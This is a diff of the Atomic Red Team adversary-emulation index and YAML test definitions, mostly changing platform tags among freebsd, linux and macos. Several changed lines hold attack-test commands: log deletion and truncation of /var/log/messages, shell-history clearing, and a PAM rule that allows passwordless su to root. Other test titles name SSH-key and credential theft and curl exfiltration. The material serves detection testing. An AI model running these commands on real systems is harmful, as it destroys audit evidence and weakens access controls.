- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
@@ -60,10 +60,10 @@
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -75,10 +75,10 @@
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -87,8 +87,8 @@
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
@@ -148,9 +148,9 @@
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on macOS [macos]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [freebsd, linux, macos]
- Atomic Test #4: CC compile [freebsd, linux, macos]
- Atomic Test #5: Go compile [freebsd, linux, macos]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -161,8 +161,8 @@
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
@@ -174,7 +174,7 @@
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
@@ -203,15 +203,15 @@
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
@@ -233,7 +233,7 @@
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -323,7 +323,7 @@
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -334,19 +334,19 @@
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #14: whois file download [freebsd, linux, macos]
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
- Atomic Test #1: Connection Proxy [linux, macos]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -356,9 +356,9 @@
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
@@ -422,7 +422,7 @@
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -518,7 +518,7 @@
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -527,10 +527,10 @@
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -552,17 +552,17 @@
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #7: Enumerate users and groups [linux, macos]
- Atomic Test #8: Enumerate users and groups [macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
@@ -577,9 +577,9 @@
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [freebsd, linux, macos]
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #8: Hostname Discovery [linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -592,16 +592,16 @@
- Atomic Test #9: List macOS Firewall Rules [macos]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
- Atomic Test #1: Process Discovery - ps [linux, macos]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #8: Examine password policy - macOS [macos]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -609,8 +609,8 @@
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
@@ -648,24 +648,24 @@
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
@@ -684,8 +684,8 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- Atomic Test #2: Command-Line Interface [linux, macos]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -733,19 +733,19 @@
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
@@ -968,9 +968,9 @@
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+140 -251
View File
@@ -1037,7 +1037,7 @@ defense-evasion:
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
@@ -1311,9 +1311,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -1335,9 +1334,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -1359,9 +1357,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -1383,9 +1380,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -1460,9 +1456,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
owner:
description: Username of desired owner
@@ -1523,7 +1518,7 @@ defense-evasion:
Remove's a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
input_arguments:
file_to_modify:
description: Path of the file
@@ -1572,7 +1567,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
source_file:
description: Path of c source file
@@ -1636,7 +1631,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
source_file:
description: Path of c source file
@@ -3164,7 +3159,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
@@ -3203,7 +3198,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
@@ -3242,7 +3237,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
@@ -3852,7 +3847,6 @@ defense-evasion:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
test_message:
description: Test message to echo out to the screen
@@ -4787,7 +4781,7 @@ defense-evasion:
Detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -4938,7 +4932,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
rm -rf /var/log/messages
@@ -4997,7 +4991,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
--size=0 /var/log/security #size parameter \n"
@@ -5042,7 +5036,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
@@ -5116,7 +5110,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'echo '''' > /var/log/messages
@@ -5172,7 +5166,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'unlink /var/log/messages
@@ -7414,7 +7408,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'rm ~/.sh_history
@@ -7438,7 +7432,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'echo "" > ~/.sh_history
@@ -7463,7 +7457,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'cat /dev/null > ~/.sh_history
